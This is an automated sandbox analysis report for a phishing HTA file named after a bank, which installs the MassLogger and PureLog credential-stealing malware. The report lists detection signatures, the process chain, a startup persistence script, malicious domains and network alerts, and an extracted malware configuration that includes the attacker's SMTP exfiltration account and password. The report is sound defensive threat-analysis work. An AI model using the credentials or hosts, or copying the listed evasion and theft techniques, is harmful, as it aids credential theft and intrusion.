Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ziraat_Swift.hta

Overview

General Information

Sample name:Ziraat_Swift.hta
Analysis ID:1566438
MD5:42080886d61700323e62d2de3a32454d
SHA1:0d499a3a4b044cdd2685c2df7de1c4ebe740703f
SHA256:5f0d6bb3445ed0c410b2dd8874cf7fc7b1c4e06cc2e620790eb782f2c339c796
Tags:htauser-lowmal3
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Drops VBS files to the startup folder
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7212 cmdline: mshta.exe "C:\Users\user\Desktop\Ziraat_Swift.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • x.exe (PID: 7340 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 60633CA891471EE569DFF187A7C5FF59)
      • differences.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 60633CA891471EE569DFF187A7C5FF59)
        • RegSvcs.exe (PID: 7496 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • armsvc.exe (PID: 7380 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: C8BF45BDD9AC7A2C04E7836B9AC9D15E)
  • alg.exe (PID: 7412 cmdline: C:\Windows\System32\alg.exe MD5: 70BB2AC3B1D5DF22D2B74DA852AD13AA)
  • elevation_service.exe (PID: 7568 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 325FCE66CB0133E663D042F034BDE5AF)
  • maintenanceservice.exe (PID: 7624 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: FED16854B8EA309A65BF6450ECACF0D0)
  • wscript.exe (PID: 7760 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • differences.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\subpredicate\differences.exe" MD5: 60633CA891471EE569DFF187A7C5FF59)
      • RegSvcs.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\subpredicate\differences.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • differences.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Local\subpredicate\differences.exe" MD5: 60633CA891471EE569DFF187A7C5FF59)
        • RegSvcs.exe (PID: 8008 cmdline: "C:\Users\user\AppData\Local\subpredicate\differences.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7280 cmdline: C:\Windows\system32\AppVClient.exe MD5: D57EFB62378CB9FE5ABA5C4735D90C00)
  • FXSSVC.exe (PID: 7628 cmdline: C:\Windows\system32\fxssvc.exe MD5: B7AC35C8D5EC032758BDF18DAF940E76)
  • msdtc.exe (PID: 4928 cmdline: C:\Windows\System32\msdtc.exe MD5: 6B414CB462A630E3121C6075205CFF23)
  • PerceptionSimulationService.exe (PID: 7768 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 4E2ACC748CE94AC4AC70C66C0815F52C)
  • perfhost.exe (PID: 7792 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 44C283F4BD1BAB81C2FA725DEF4F6B81)
  • Locator.exe (PID: 7832 cmdline: C:\Windows\system32\locator.exe MD5: DCAC6C83695DE7AFC6FBC22B2463934D)
  • SensorDataService.exe (PID: 7844 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 723558C0A185F957C2EBE638F8BBB34E)
  • snmptrap.exe (PID: 7984 cmdline: C:\Windows\System32\snmptrap.exe MD5: B2CFA94DAEAB765B33AE6E7BD777C6D9)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.1924522530.0000000003EE0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 5A 88 44 24 2B 88 44 24 2F B0 6B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000005.00000002.2946618374.0000000002B60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000F.00000002.2945957784.0000000003070000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
        0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          15.2.RegSvcs.exe.2d30ee8.2.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            15.2.RegSvcs.exe.2d30ee8.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              15.2.RegSvcs.exe.2d30ee8.2.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                15.2.RegSvcs.exe.2d30ee8.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  15.2.RegSvcs.exe.2d30ee8.2.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x1d74b:$a1: get_encryptedPassword
                  • 0x1d71f:$a2: get_encryptedUsername
                  • 0x1d7e3:$a3: get_timePasswordChanged
                  • 0x1d6fb:$a4: get_passwordField
                  • 0x1d761:$a5: set_encryptedPassword
                  • 0x1d52e:$a7: get_logins
                  • 0x1cab8:$a8: GetOutlookPasswords
                  • 0x1bfe1:$a9: StartKeylogger
                  • 0x1a943:$a10: KeyLoggerEventArgs
                  • 0x1a912:$a11: KeyLoggerEventArgsEventHandler
                  • 0x1d602:$a13: _encryptedPassword
                  Click to see the 87 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Legitimate Application Dropped Executable
                  Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7212, TargetFilename: C:\Users\user\AppData\Local\Temp\x.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , ProcessId: 7760, ProcessName: wscript.exe
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
                  Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\subpredicate\differences.exe, ParentProcessId: 7436, ParentProcessName: differences.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ProcessId: 7496, ProcessName: RegSvcs.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs" , ProcessId: 7760, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\subpredicate\differences.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-02T07:56:26.236257+010020516491A Network Trojan was detected192.168.2.4526291.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-02T07:56:17.558035+010020516481A Network Trojan was detected192.168.2.4623341.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-02T07:56:10.027681+010020181411A Network Trojan was detected54.244.188.17780192.168.2.449731TCP
                  2024-12-02T07:56:13.018778+010020181411A Network Trojan was detected18.141.10.10780192.168.2.449734TCP
                  2024-12-02T07:56:17.612052+010020181411A Network Trojan was detected44.221.84.10580192.168.2.449737TCP
                  2024-12-02T07:57:55.225518+010020181411A Network Trojan was detected47.129.31.21280192.168.2.449872TCP
                  2024-12-02T07:57:58.046080+010020181411A Network Trojan was detected13.251.16.15080192.168.2.449881TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-02T07:56:10.027681+010020377711A Network Trojan was detected54.244.188.17780192.168.2.449731TCP
                  2024-12-02T07:56:13.018778+010020377711A Network Trojan was detected18.141.10.10780192.168.2.449734TCP
                  2024-12-02T07:56:17.612052+010020377711A Network Trojan was detected44.221.84.10580192.168.2.449737TCP
                  2024-12-02T07:57:55.225518+010020377711A Network Trojan was detected47.129.31.21280192.168.2.449872TCP
                  2024-12-02T07:57:58.046080+010020377711A Network Trojan was detected13.251.16.15080192.168.2.449881TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-02T07:56:15.319591+010028032742Potentially Bad Traffic192.168.2.449733193.122.130.080TCP
                  2024-12-02T07:56:27.710262+010028032742Potentially Bad Traffic192.168.2.449749193.122.130.080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-02T07:56:24.097750+010028508511Malware Command and Control Activity Detected192.168.2.44974454.244.188.17780TCP
                  2024-12-02T07:57:38.022398+010028508511Malware Command and Control Activity Detected192.168.2.44979082.112.184.19780TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://ww99.przvgke.biz/widfafwxfswrijuAvira URL Cloud: Label: malware
                  Source: http://ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590Avira URL Cloud: Label: malware
                  Source: http://ww99.przvgke.biz/widfafwxfswrijAvira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/jenyp?usid=26&utid=9204704395Avira URL Cloud: Label: malware
                  Source: http://ww99.przvgke.biz/jenypAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Found malware configuration
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}
                  Multi AV Scanner detection for domain / URL
                  Source: ww99.przvgke.bizVirustotal: Detection: 11%Perma Link
                  Source: ww99.fwiwk.bizVirustotal: Detection: 13%Perma Link
                  Source: ww7.fwiwk.bizVirustotal: Detection: 14%Perma Link
                  Source: ww7.przvgke.bizVirustotal: Detection: 13%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: Ziraat_Swift.htaVirustotal: Detection: 8%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Machine Learning detection for dropped file
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49736 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49752 version: TLS 1.0
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: x.exe, 00000001.00000003.1727383425.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdbGCTL source: x.exe, 00000001.00000003.1732725251.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.1807821969.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.2177924834.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000003.00000003.1764935316.0000000001530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroCEF\AcroCEF.pdbI source: alg.exe, 00000003.00000003.1844352415.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.2099445651.0000000001430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.1862089697.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.1862089697.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: updater.pdb source: alg.exe, 00000003.00000003.2384907802.00000000004A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.2161039074.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.1807821969.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb source: x.exe, 00000001.00000003.1732725251.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.2099445651.0000000001430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.2177924834.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroCEF\AcroCEF.pdb source: alg.exe, 00000003.00000003.1844352415.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000003.00000003.1764935316.0000000001530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.2161039074.0000000001570000.00000004.00001000.00020000.00000000.sdmp

                  Spreading

                  barindex
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
